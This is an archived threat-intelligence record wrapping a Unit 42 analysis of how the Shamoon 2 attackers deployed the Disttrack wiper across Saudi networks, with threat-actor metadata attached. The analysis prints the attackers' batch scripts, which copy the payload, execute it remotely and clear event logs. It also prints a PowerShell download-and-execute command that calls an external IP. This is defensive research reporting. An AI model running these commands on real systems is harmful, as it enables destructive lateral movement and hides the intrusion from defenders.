{ "id": "2efe6664-66d8-4924-a6b6-d77573dd9d0f", "created_at": "2026-04-06T00:20:52.327858Z", "updated_at": "2026-04-10T13:11:27.481597Z", "deleted_at": null, "sha1_hash": "c6a21866539c9e1f90bd4930fd3a7160ecab9507", "title": "Shamoon 2: Delivering Disttrack", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 169740, "plain_text": "Shamoon 2: Delivering Disttrack\r\nBy Robert Falcone, Bryan Lee\r\nPublished: 2017-03-26 · Archived: 2026-04-05 20:23:48 UTC\r\nSince late November 2016, the Shamoon 2 attack campaign has brought three waves of destructive attacks to\r\norganizations within Saudi Arabia. Our investigation into these attacks has unearthed more details into the method\r\nby which the threat actors delivered the Disttrack payload. We have found evidence that the actors use a\r\ncombination of legitimate tools and batch scripts to deploy the Disttrack payload to hostnames known to the\r\nattackers to exist in the targeted network.\r\nOur analysis shows that the actors likely gathered the list of known hostnames directly from Active Directory or\r\nduring their network reconnaissance activities conducted from a compromised host. This network reconnaissance,\r\ncoupled with the credential theft needed to hardcode Disttrack payloads with legitimate username and password\r\ncredentials, leads us to believe that it is highly likely the threat actors had sustained access to the targeted\r\nnetworks prior to Shamoon 2 attacks. Our research confirms that successful credential theft from targeted\r\norganizations was an integral part of the Shamoon 2 attackers’ playbook, and they used these stolen credentials for\r\nremote access and lateral movement.\r\nOur analysis also shows an actor distributes Disttrack within the targeted network by first compromising a system\r\nthat is used as the Disttrack distribution server on that network. The actor then uses this server to compromise\r\nother systems on the network by using the hostname to copy over and execute the Disttrack malware. On each of\r\nthese named systems that are successfully compromised, the Disttrack malware will attempt to propagate itself to\r\n256 additional IP addresses on the local network. This rudimentary, but effective, distribution system can enable\r\nDisttrack to propagate to additional systems from a single, initially compromised system in a semi-automated\r\nfashion.\r\nIn this posting we also explore a possible connection between Shamoon 2 and the Magic Hound campaign, where\r\nwe outline evidence of a potential connection between these two attack campaigns. Furthermore, we explore a\r\npossible scenario on how these two attack campaigns could have worked in conjunction with each other to execute\r\nthe Shamoon 2 attacks.\r\nDelivery Method\r\nSince our initial blog discussing the reemergence of Shamoon in November 2016, we were curious how the threat\r\nactor initially delivers the Disttrack payload to the targeted network. We were equally curious about how Disttrack\r\nwas so effective at causing mass destruction on targeted networks, as we mentioned in our initial blog that the\r\nDisttrack Trojan itself is only able to spread to 256 IP addresses on the same local network as the compromised\r\nhost.\r\nFrom gathering files associated in the third wave of Shamoon 2 attacks, we found a Zip archive that contains files\r\nwhich the attacker used to infect other systems on the targeted network from a single compromised system they\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/\r\nPage 1 of 7\n\nthen use as a Disttrack distribution server. The actor deploys the Zip archive to this distribution server by logging\r\nin to the compromised system using Remote Desktop Protocol (RDP) with stolen, legitimate credentials and\r\ndownloading the Zip from a remote server. The actor uses this single compromised system to distribute Disttrack\r\nto other systems in different parts of the network, where the Disttrack Trojan would attempt to spread to 256 other\r\nsystems on each local network. The chart in Figure 1 visualizes the delivery of Disttrack at a high level.\r\nEtt fel inträffade.\r\nDet går inte att köra JavaScript.\r\nFigure 1 High-level view of Disttrack deployment in Shamoon 2 attack\r\nDistributing Disttrack\r\nAs mentioned before, we obtained files used by the threat actors to deploy the Disttrack payload to additional\r\nsystems on the network. While we do not know exactly how the threat actor initially compromised and gained\r\nRDP access to the Disttrack distribution server, we believe the actor downloads a Zip archive contained a number\r\nof files to this system, including files with names listed in Table 1. The set of files saved to the distribution server\r\nincludes executables, batch scripts and text files. We will explain the purpose and contents of each of these files\r\nand how the actor uses them in the deployment of Disttrack.\r\nFilename Description\r\nexec-template.txtLauncher commands (not a batch script) the actor runs to launch the deployment of the\r\nDisttrack payload onto additional systems at the targeted organization\r\n1.txt – 400.txt\r\nSequentially named text files containing DNS values for hostnames of systems on targeted\r\nnetwork\r\nok.bat Deployment batch script\r\nntertmgr32.bat Disttrack installation batch script\r\nntertmgr32.exe Disttrack payload\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/\r\nPage 2 of 7\n\npa.exe PAExec, Power Admin’s open source PsExec alternative\r\nTable 1 Files associated with the Disttrack Distribution Server\r\nWhen deploying Disttrack on the targeted network, the threat actor runs the commands stored in the exec-template.txt file that reads in the contents of each of the “1.txt” through “400.txt” text files, which contain a list of\r\nhostnames of systems on the network, one hostname per line. The commands then run the “ok.bat” deployment\r\nbatch script once for each hostname from the text files. Figure 2 shows the contents of the “exec-template.txt”\r\nlauncher script, which uses for loops to run the deployment batch script using each hostname within the text files\r\nas an argument (lines removed for brevity).\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\nfor /F %J in (1.txt) do ok.bat %J\r\nfor /F %J in (2.txt) do ok.bat %J\r\nfor /F %J in (3.txt) do ok.bat %J\r\nfor /F %J in (4.txt) do ok.bat %J\r\nfor /F %J in (5.txt) do ok.bat %J\r\nfor /F %J in (6.txt) do ok.bat %J\r\nfor /F %J in (7.txt) do ok.bat %J\r\nfor /F %J in (8.txt) do ok.bat %J\r\nfor /F %J in (9.txt) do ok.bat %J\r\nfor /F %J in (10.txt) do ok.bat %J\r\nfor /F %J in (11.txt) do ok.bat %J\r\nfor /F %J in (12.txt) do ok.bat %J\r\nfor /F %J in (13.txt) do ok.bat %J\r\nfor /F %J in (14.txt) do ok.bat %J\r\nfor /F %J in (15.txt) do ok.bat %J\r\n..snip..\r\nfor /F %J in (399.txt) do ok.bat %J\r\nfor /F %J in (400.txt) do ok.bat %J\r\nFigure 2 Contents of the exec-template.txt batch script\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/\r\nPage 3 of 7\n\nAt first, we believed the actor would change the file extension of the exec-template.txt file to “.bat” and execute it\r\nas a batch script. We no longer believe this is the case as the “for” commands contained within exec-template.txt\r\nreference variables using a single percent symbol, specifically “%J” as seen in Figure 2. This causes a syntax error\r\nif executed within a batch script. According to MSDN, to execute these “for” commands within a batch script, the\r\nactor would have to use two percent symbols, specifically “%%J” in this case. We now believe that the threat actor\r\nmanually copies the contents of exec-template.txt and pastes these commands directly within command prompt to\r\nrun them.\r\nWe cannot show the contents of the “1.txt” through “400.txt” files, as they contain new-line-delimited lists of the\r\nDNS names for hosts specific to the targeted organizations.\r\nIn the files we obtained from the Disttrack distribution server, there were only 29 instead of 400 text files, each of\r\nwhich contained 30 hostnames, except for the last one only containing four for a total of 844 hostnames. In the\r\ntext files we analyzed, the hostnames were included as their DNS name, specifically in the format \u003ccomputer\r\nname\u003e.\u003cdomain name\u003e.local, which we believe shows they were obtained directly from Active Directory on a\r\ndomain controller. The importance of including the DNS names for these hosts on the network is that is allows the\r\nactor to connect to these systems in subsequent commands.\r\nThe “ok.bat” batch script runs once per hostname mentioned above. This batch script is responsible for deploying\r\nDisttrack on each of these systems on the network. The script begins by copying two files to the\r\n“C:\\Windows\\temp” folder on the remote system. The two copied files – named “ntertmgr32.exe” and\r\n“ntertmgr32.bat” – are the Disttrack payload and a batch script used to install the Disttrack payload on the local\r\nsystem, respectively. The “ok.bat” script uses the PAExec (“pa.exe”) application to run the “ntertmgr32.bat”\r\ninstallation script on the remote system. The batch script also attempts to clear event logs via the Windows built-in\r\n“wevtutil” utility in an attempt to conceal their activities and disrupt incident response and forensic analysis.\r\nFigure 3 shows the contents of the “ok.bat” script. Interestingly, the actor included an argument “-r SVCNSS”,\r\nwhich is an invalid argument for PAExec and the actor would need to remove it prior to distribution. The “-r”\r\nargument is a valid argument within Microsoft’s PsExec that specifies the name of the remote service to create,\r\nsuggesting the threat actors may have also used the PsExec application for distribution as well.\r\ncopy /Y ntertmgr32.bat \\\\%1\\C$\\Windows\\temp\\\r\ncopy /Y ntertmgr32.exe \\\\%1\\C$\\Windows\\temp\\\r\npa.exe \\\\%1 -r SVCNSS -s -d C:\\\\Windows\\temp\\ntertmgr32.bat\r\nfor /F %%i in ('wevtutil el /r:%1' ) do (wevtutil cl /r:%1 %%i )\r\nFigure 3 Contents of the ok.bat batch script\r\nThe “ntertmgr32.bat” batch script that runs on each end system is responsible for installing the Disttrack payload\r\nas a service on the local system. The batch script, as seen in Figure 4, first copies the Disttrack payload\r\n(“ntertmgr32.exe”) to the “C:\\Windows\\System32” folder and then executes the newly copied file using the “start”\r\ncommand with “service” as an argument. This script not only installs but also launches the Disttrack payload.\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/\r\nPage 4 of 7\n\n@echo off\r\nset u100=ntertmgr32.exe\r\nset u200=service\r\nset u800=%~dp0\r\ncopy /Y \"%u800%%u100%\" \"%systemroot%\\system32\\%u100%\"\r\nstart /b %systemroot%\\system32\\%u100% %u200%\r\nFigure 4 Contents of the ntertmgr32.bat batch script\r\nOnce the Disttrack payload executes, it will begin carrying out its functionality, specifically attempting to spread\r\nto other systems on the local network and wiping systems at a pre-defined time in the future. As discussed in our\r\ninitial blog on Shamoon 2, the Disttrack payload will attempt to infect additional systems on the same subnet\r\n(x.x.x.0-x.x.x.255) by logging in to the remote system, copying itself to the system, and executing the copied\r\npayload by creating a scheduled task to run the payload.\r\nDisttrack Distribution System – Possible Link to Magic Hound\r\nAs mentioned earlier in this blog post, we know that the threat actor downloads several files to the distribution\r\nserver to infect systems on the network with Disttrack. In addition to the files mentioned in the previous section, it\r\nappears that the threat actor copied a PowerShell script to the distribution server as well. This PowerShell script,\r\nseen in Figure 5, appears to have been generated by Metasploit’s “web_delivery” module to download and execute\r\na payload from a remote server at 45.76.128[.]71, which we speculate was used to create a meterpreter session on\r\nthe system.\r\npowershell.exe -nop -w hidden -c $L=new-object net.webclient;$L.proxy=\r\n[Net.WebRequest]::GetSystemWebProxy();$L.Proxy.Credentials=\r\n[Net.CredentialCache]::DefaultCredentials;IEX $L.downloadString(\"http://45.76.128.71:8080/[random\r\nstring redacted]\");\r\nFigure 5 PowerShell script used to download files to distribution system\r\nThe server hosting the files has an IP address of 45.76.128[.]71, which resides within the IP range associated with\r\na cloud hosting service that allows customers to create server instances in specific geographic locations and\r\nconfigurations. According to GeoIP mapping data for 45.76.128[.]71, it appears this IP range is geographically\r\nbased in the London cloud instance. The use of this specific IP is interesting, as the Magic Hound campaign we\r\npreviously reported on (February 2017) used a command and control (C2) server at 45.76.128[.]165, which is on\r\nthe same Class C IP range.\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/\r\nPage 5 of 7\n\nWhile we cannot conclusively state the existence of a specific relationship between the Shamoon and Magic\r\nHound adversaries, there are now several factors that are suggestive of some form of association, including:\r\n1. Targeting of entities within Saudi Arabia.\r\n2. Use of the same cloud computing service in the same Class C IP range.\r\n3. Use of PowerShell and meterpreter.\r\nTaken together, these are all factors to consider when postulating a relationship between the Shamoon and Magic\r\nHound attackers. Furthermore, it is possible that these artifacts were some of the factors used by our peers at X-Force and Kaspersky to tie the Magic Hound attacks to Shamoon.\r\nIf the Magic Hound attacks are indeed related to the Shamoon attack cycle, we may be able to hypothesize that the\r\nMagic Hound attacks were used as a beachhead to perform reconnaissance for the adversaries and gather network\r\ninformation and credentials. This may be further supported by the initial Magic Hound payloads we discovered,\r\nPupy RAT and meterpreter, both of which have these types of capabilities.\r\nConclusion\r\nWe have determined that the actors conducting the Shamoon 2 attacks use one compromised system as a\r\ndistribution point to deploy the destructive Disttrack Trojan to other systems on the targeted network, after which\r\nthe Disttrack malware will seek to propagate itself even further into the network. Using an open source utility\r\ncalled PAExec and several batch scripts, the actor copies the Disttrack payload to other systems on the network,\r\nwhich we believe are discovered directly from Active Directory or through network reconnaissance activities.\r\nOnce the Disttrack payload has been deployed to these initial hosts, Disttrack will attempt to spread on their local\r\nnetworks to amplify the impact of the attack. While the actors interact directly with the distribution system, the\r\nuse of this single compromised system allows the actors to automate the deployment of the payload to quickly\r\ninfect systems on the targeted network. Also, these findings provide a possible relation between the Shamoon and\r\nMagic Hound attack campaigns. We will continue to analyze these attacks to determine further activities carried\r\nout by these actors and expose any additional correlations to known threat groups.\r\nThe theft and subsequent reuse of credentials is a common element in many attackers’ playbooks. We have\r\nrecently published a white paper, “Credential-Based Attacks: Exposing the Ecosystem and Motives Behind\r\nCredential Phishing, Theft and Abuse,” detailing how credentials are stolen and later abused, with guidance on\r\nhow you can defend yourself and your organization against this type of threat. Collectively, the Shamoon 2 attacks\r\nare a good example not only of ways attackers obtain stolen credentials but also of what they can do with them.\r\nIndicators of Compromise\r\n4919436d87d224f083c77228b48dadfc153ee7ad48dd7d22f0ba0d5090b5cf9b: exec-template.txt\r\n5475f35363e2f4b70d4367554f1691f3f849fb68570be1a580f33f98e7e4df4a: ok.bat\r\n01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc: pa.exe\r\nc7f937375e8b21dca10ea125e644133de3afc7766a8ca4fc8376470277832d95: ntertmgr32.bat\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/\r\nPage 6 of 7\n\nIgnite '17 Security Conference: Vancouver, BC June 12–15, 2017\r\nIgnite '17 Security Conference is a live, four-day conference designed for today’s security professionals. Hear\r\nfrom innovators and experts, gain real-world skills through hands-on sessions and interactive workshops, and find\r\nout how breach prevention is changing the security industry. Visit the Ignite website for more information on\r\ntracks, workshops and marquee sessions.\r\nSource: http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "origins": [ "web" ], "references": [ "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/" ], "report_names": [ "unit42-shamoon-2-delivering-disttrack" ], "threat_actors": [ { "id": "d8af157e-741b-4933-bb4a-b78490951d97", "created_at": "2023-01-06T13:46:38.748929Z", "updated_at": "2026-04-10T02:00:03.087356Z", "deleted_at": null, "main_name": "APT35", "aliases": [ "COBALT MIRAGE", "Agent Serpens", "Newscaster Team", "Magic Hound", "G0059", "Phosphorus", "Mint Sandstorm", "TunnelVision" ], "source_name": "MISPGALAXY:APT35", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4", "created_at": "2022-10-25T15:50:23.808974Z", "updated_at": "2026-04-10T02:00:05.291959Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "Magic Hound", "TA453", "COBALT ILLUSION", "Charming Kitten", "ITG18", "Phosphorus", "APT35", "Mint Sandstorm" ], "source_name": "MITRE:Magic Hound", "tools": [ "Impacket", "CharmPower", "FRP", "Mimikatz", "Systeminfo", "ipconfig", "netsh", "PowerLess", "Pupy", "DownPaper", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03", "created_at": "2025-08-07T02:03:24.746965Z", "updated_at": "2026-04-10T02:00:03.640335Z", "deleted_at": null, "main_name": "COBALT ILLUSION", "aliases": [ "APT35 ", "APT42 ", "Agent Serpens Palo Alto", "Charming Kitten ", "CharmingCypress ", "Educated Manticore Checkpoint", "ITG18 ", "Magic Hound ", "Mint Sandstorm sub-group ", "NewsBeef ", "Newscaster ", "PHOSPHORUS sub-group ", "TA453 ", "UNC788 ", "Yellow Garuda " ], "source_name": "Secureworks:COBALT ILLUSION", "tools": [ "Browser Exploitation Framework (BeEF)", "MagicHound Toolset", "PupyRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f", "created_at": "2022-10-25T16:07:23.83826Z", "updated_at": "2026-04-10T02:00:04.761303Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "APT 35", "Agent Serpens", "Ballistic Bobcat", "Charming Kitten", "CharmingCypress", "Cobalt Illusion", "Cobalt Mirage", "Educated Manticore", "G0058", "G0059", "Magic Hound", "Mint Sandstorm", "Operation BadBlood", "Operation Sponsoring Access", "Operation SpoofedScholars", "Operation Thamar Reservoir", "Phosphorus", "TA453", "TEMP.Beanie", "Tarh Andishan", "Timberworm", "TunnelVision", "UNC788", "Yellow Garuda" ], "source_name": "ETDA:Magic Hound", "tools": [ "7-Zip", "AnvilEcho", "BASICSTAR", "CORRUPT KITTEN", "CWoolger", "CharmPower", "ChromeHistoryView", "CommandCam", "DistTrack", "DownPaper", "FRP", "Fast Reverse Proxy", "FireMalv", "Ghambar", "GoProxy", "GorjolEcho", "HYPERSCRAPE", "Havij", "MPK", "MPKBot", "Matryoshka", "Matryoshka RAT", "MediaPl", "Mimikatz", "MischiefTut", "NETWoolger", "NOKNOK", "PINEFLOWER", "POWERSTAR", "PowerLess Backdoor", "PsList", "Pupy", "PupyRAT", "SNAILPROXY", "Shamoon", "TDTESS", "WinRAR", "WoolenLogger", "Woolger", "pupy", "sqlmap" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434852, "ts_updated_at": 1775826687, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c6a21866539c9e1f90bd4930fd3a7160ecab9507.pdf", "text": "https://archive.orkl.eu/c6a21866539c9e1f90bd4930fd3a7160ecab9507.txt", "img": "https://archive.orkl.eu/c6a21866539c9e1f90bd4930fd3a7160ecab9507.jpg" } }